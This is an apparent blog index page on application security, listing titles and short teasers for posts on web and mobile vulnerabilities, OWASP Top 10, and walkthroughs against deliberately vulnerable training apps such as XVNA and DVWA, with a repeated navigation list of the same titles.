Application Security | General

General
Common web application attacks and quick steps to prevent them
Management needs to take care of the security, especially the security of your sensitive customer information’s. It’s so often only the most high profile or sophisticated attacks that you actually hear about , but the reality is there are n number ...
Top Mistakes when Performing a Web Vulnerability Assessment
Last year, according to security vendor Secunia, statistics says the no of vulnerabilities detected in commercial software’s found over 15500 in total 3870 Products. Unfortunately, many vulnerabilities remain open for many weeks, or even years as ...
Why Web Vulnerabilities testing to be Automated
If you maintain a website, a web application or you just simply user of that website, you probably would want to find out a little bit about the sites that you own or have visited as to whether or not they are actually secure. There are some great ...
Network Vulnerability Scanning
Vulnerability scanning is an inspection of the potential points of exploit on a computer or network to identify security holes. A vulnerability scan detects and classifies system weaknesses in computers, networks and communications equipment and ...
Web security issues you need to be concerned
1. SQL Injection (SQLi) The SQL injection is the most common web security issue faced by most of the companies. An SQL injection is the injection attack where hackers can input malicious SQL queries to pull sensitive data from the database. These SQL ...
Common website vulnerabilities
These are the some common website vulnerabilities found during the vulnerability scan. Always developers need to plan to block these loop holes for eliminating these following common vulnerabilities. 1. SQL INJECTIONS SQL injection is a type of web ...
Why we need Web Testing for Web Application ?
Why we need Web Testing for Web Application In a simple terms web testing is checking your web application for potential bugs before it’s made live or before code is moved into the production environment. During this stage issues such as that of web ...
How to Find Vulnerabilities in Website?
Finding web vulnerabilities and closing those security loop gaps proactively is an absolute must for now a days businesses. But, many organizations lack the tools and expertise to identify threats in their applications. To help your organization ...
What is the penetration testing tool & importance?
Penetration testing is the process of validating and scanning your web applications for finding threats in the application. In other words for answering a simple question: "What could a hacker do to harm my web application, or organisation’s online ...
Why Web Application Testing is important?
In this modern digital world, simply going online can expose us to a number of harmful cyber threats online. Now a day’s we can complete our grocery shopping to school bills, admissions via online. If you manage a company or some organization, your ...
Vulnerability Assessment Checklist
A vulnerability assessment is a process that identifies and assigns severity levels to security vulnerabilities in Web applications that a malicious actor can potentially exploit. The assessment is conducted manually and augmented by commercial or ...
How to improve Web Application Security
Web application security is one major element in web app development that that often gets overlooked. It’s understandable. Business websites and applications need to be as accessible yet robust as possible, but this presents a huge range of security ...
OWASP TOP
The OWASP Top Ten is a powerful awareness document for web application security. The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are. Project members include a variety of security experts ...
XVNA
XVNA is an Extreme Vulnerable Node Application that helps security enthusiasts to learn application security and it’s helps to developers better understand the processes of securing applications and It’s totally legal to break or hack into this. ...
XVNA Setup
Hey Friends, This tutorial is about setting up Extreme Vulnerable Node Application (XVNA) in your localhost. Extreme vulnerable node application is available at Github https://github.com/vegabird/xvna and you can download it and test in your ...
OWAP TOP 10 2017
Application Security Risk 2017 The OWASP top ten has been changed and following list is the updated. A1:2017 – Injection A2:2017 – Broken Authentication A3:2017 – Sensitive Data Exposure A4:2017 – XML External Entities (XXE) A5:2017 – Broken Access ...
OS Injection
Hi, This post is regarding OS Injection. Injection always possible on user input field only. In OS injection first, we need to determine the Operating System (OS) on which the server running. So we are running on Windows and the payload varies. For ...
NoSql Injection
In this tutorial, we will see how we can bypass NoSQL (MongoDB) in Extreme Vulnerable Node Application (XVNA). In normal SQL injection, we have few special characters which could use to find the vulnerability and so we have for NoSql. Most of the ...
Server Side Js Injection
Hi, in this tutorial we will see how server-side js injection is performed in the Extreme Vulnerable Node Application. As we know the application is running on Nodejs, so we know what are its command or its predefined tags which could be utilized to ...
Sensitive Data Exposure
Hi, in this video we are going to see how do we crack the sensitive data exposure of Extreme Vulnerable Node Application (XVNA). This vulnerability can be found in any attack and on any module, where we could see extra data or sensitive data which a ...
Sensitive Data Header
Hi, in this part of Extreme Vulnerable Node Application we do not have any input to be given. But here we could see easily that the header is exposed through which any user could find which technologies we are using and find exploit easily. So our ...
Broken Access Control
Hi, in this tutorial we will see Access Control of Extreme Vulnerable Node Application (XVNA). The main aim is to break the access, in XVNA we found vulnerability of IDOR (Insecure Direct Object Reference). This could be vulnerable and could be used ...
Cross Site Scripting
Hi, in this part of Extreme Vulnerable Node Application (XVNA) we will see how the XSS is been executed. As we know we are running on Expressjs and angularjs so there is only few method in angularjs on which XSS could be executed. Let’s see how we ...
Security Misconfiguration
Hi, in this post we will see how security misconfiguration is working and how it could be used. The security misconfiguration in Extreme Vulnerable Node Application (XVNA) is the stack trace, which should not be shown to the user because that may ...
command injection
Hi, This post is regarding Command Injection. Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application ...
Broken Authentication
Hi, in this tutorial of Extreme Vulnerable Node Application (XVNA) we show the Broken Authentication vulnerability where we could access the application without having any credentials and could also use its REST call without any authentication. This ...
DOM XSS
Hi, In this part of Damn Vulnerable Web Application. (DVWA) we will see how the DOM XSS is been executed. DOM Based XSS simply means a Cross-site scripting vulnerability that appears in the DOM (Document Object Model) instead of part of the HTML. ...
XML External Entity Injection
Hi, This post is regarding XML External Entity Injection. An XML External Entity attack is a type of attack against an application that parses XML input. Attacks can include disclosing local files, which may contain sensitive data such as passwords ...
Android Reverse Engineering
Hi, This post is regarding Android Reverse engineering. Reverse engineering : Reverse engineering is taking apart an object to see how it works in order to duplicate or enhance the object. The practice, taken from older industries, is now frequently ...
XML Injection
In this post, we will see about XML injection. XML injection can also be said as XPath injection where we inject our payload which is more or less similar to SQL injection. We could check the availability of XML injection by using single quote. If it ...
Sub Domain Takeover
Hi, in this tutorial we will see what is Sub domain take over and how it works. The Subdomain takeover is considered to be highly vulnerable and it could cause to control complete subdomain takeover. The takeover could be done only if the subdomain ...
HTTP Parameter Pollution
HTTP Parameter Pollution (HPP) vulnerabilities allow attackers to exploit web applications by manipulating the query parameters in the URL and requested body which causes the Cross Site Scripting or Privilege Escalation or bypass Authorization. ...
Error Based SQL Injection
Hi, In this post, we will learn about Error-based SQL injection. We know that there are three types of SQL injection. Union Based Injection Error Based injection Blind SQL injection Now to find SQL injection we generally use ' single quote, using ...
Insecure Data Storage
Hi guys, today we are going to see the Insecure Data Storage from the OWASP Top 10 mobile. In this there we have few important storage type through which we face problems(vulnerabilities). The types are as follows SQL Databases. Log Files. XML Data ...
How to use burp suite with android mobile
Hi, This post is regarding How to use burp suite with android mobile. Step 1: Open Settings and click Wi-Fi in your mobile. Step 2 : Click on Wi-Fi and Long press on your Connected Network (here TP-LICK_720C). Step 3 : Click on Modify network. Step 4 ...
How to detect rat on windows
Hi, This post is regarding How to detect Remote Administration Tool (RAT) on windows, RAT also stands for remote access trojan. Antivirus software can able to detect some RAT like this but still, we have many RAT which are undetected by Antivirus. In ...
How to work with Drozer (Penetration Testing Tool Mobile)
Hey Everyone, In this post, we will be seeing about Drozer and how it can be used to pen-test the android application. So for that, we need following things: A mobile device/Emulator (Rooted preferred) and with debugging mode on. Drozer agent needed ...
How to setup and use Mobile Security Framework(MobSF)
Hi, This post is regarding How to setup and use Mobile Security Framework(MobSF). Requirements : Python 2.7, Oracle JDK 1.7 or above. After this installation follows this steps. Step 1: Search Mobile Security Framework. Download this Files. Step 2: ...
insecure deserialization – xvna
Hi, This post is regarding How to find Insecure deserialization in XVNA. Since many apps that accept serialized objects do not validate or check untrusted input before deserializing it, attackers can inject malicious objects into a data stream and ...
Web Application Vulnerability Scanner
Hello Ladies & Gentleman, Here we came with the new topic `Web Application Vulnerabilities` and how do we scan it using the tool. So without any delay lets get to the topic What is Web Application Vulnerability ? The vulnerability is a weakness which ...
Next page

Popular Articles
How to detect rat on windows
Hi, This post is regarding How to detect Remote Administration Tool (RAT) on windows, RAT also stands for remote access trojan. Antivirus software can able to detect some RAT like this but still, we have many RAT which are undetected by Antivirus. In ...
How to setup and use Mobile Security Framework(MobSF)
Hi, This post is regarding How to setup and use Mobile Security Framework(MobSF). Requirements : Python 2.7, Oracle JDK 1.7 or above. After this installation follows this steps. Step 1: Search Mobile Security Framework. Download this Files. Step 2: ...
How to Find Vulnerabilities in Website?
Finding web vulnerabilities and closing those security loop gaps proactively is an absolute must for now a days businesses. But, many organizations lack the tools and expertise to identify threats in their applications. To help your organization ...
How to use burp suite with android mobile
Hi, This post is regarding How to use burp suite with android mobile. Step 1: Open Settings and click Wi-Fi in your mobile. Step 2 : Click on Wi-Fi and Long press on your Connected Network (here TP-LICK_720C). Step 3 : Click on Modify network. Step 4 ...
HTTP Parameter Pollution
HTTP Parameter Pollution (HPP) vulnerabilities allow attackers to exploit web applications by manipulating the query parameters in the URL and requested body which causes the Cross Site Scripting or Privilege Escalation or bypass Authorization. ...

Application Security | General | Blogs

General

Common web application attacks and quick steps to prevent them

Top Mistakes when Performing a Web Vulnerability Assessment

Why Web Vulnerabilities testing to be Automated

Network Vulnerability Scanning

Web security issues you need to be concerned

Common website vulnerabilities

Why we need Web Testing for Web Application ?

How to Find Vulnerabilities in Website?

What is the penetration testing tool & importance?

Why Web Application Testing is important?

Vulnerability Assessment Checklist

How to improve Web Application Security

OWASP TOP

XVNA

XVNA Setup

OWAP TOP 10 2017

OS Injection

NoSql Injection

Server Side Js Injection

Sensitive Data Exposure

Sensitive Data Header

Broken Access Control

Cross Site Scripting

Security Misconfiguration

command injection

Broken Authentication

DOM XSS

XML External Entity Injection

Android Reverse Engineering

XML Injection

Sub Domain Takeover

HTTP Parameter Pollution

Error Based SQL Injection

Insecure Data Storage

How to use burp suite with android mobile

How to detect rat on windows

How to work with Drozer (Penetration Testing Tool Mobile)

How to setup and use Mobile Security Framework(MobSF)

insecure deserialization – xvna

Web Application Vulnerability Scanner

Next page

Popular Articles

How to detect rat on windows

How to setup and use Mobile Security Framework(MobSF)

How to Find Vulnerabilities in Website?

How to use burp suite with android mobile

HTTP Parameter Pollution